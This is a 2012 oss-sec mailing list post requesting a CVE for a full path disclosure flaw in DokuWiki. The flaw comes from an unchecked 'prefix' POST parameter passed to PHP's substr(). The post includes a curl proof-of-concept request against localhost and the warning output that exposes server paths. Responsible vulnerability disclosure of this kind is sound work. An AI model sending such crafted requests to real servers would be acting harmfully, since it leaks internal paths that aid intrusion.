oss-sec mailing list archives
CVE request: Full path disclosure in DokuWiki
From: Felipe Pena <felipensp () gmail com>
Date: Sun, 24 Jun 2012 09:40:13 -0300
Full path disclosure in DokuWiki ======================================== DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database. It has a simple but powerful syntax which makes sure the datafiles remain readable outside the Wiki. The POST input 'prefix' is not checked/casted for proper data type before passing to PHP's substr() function, which lead to displays an warning with sensitive information on server with PHP error level enabled: $PRE = cleanText(substr($_POST['prefix'], 0, -1)); $ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null | grep Warning <b>Warning</b>: substr() expects parameter 1 to be string, array given in <b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/dokuwiki/doku.php:47) in <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br /> Affected versions: ======================================== - Angua (RC1) - Rincewind - Anteater References: ======================================== http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure Credits: ======================================== This vulnerability was discovered by Felipe Pena. Twitter: @felipensp -- Regards, Felipe Pena
Current thread:
- CVE request: Full path disclosure in DokuWiki Felipe Pena (Jun 24)
- Re: CVE request: Full path disclosure in DokuWiki Kurt Seifried (Jun 24)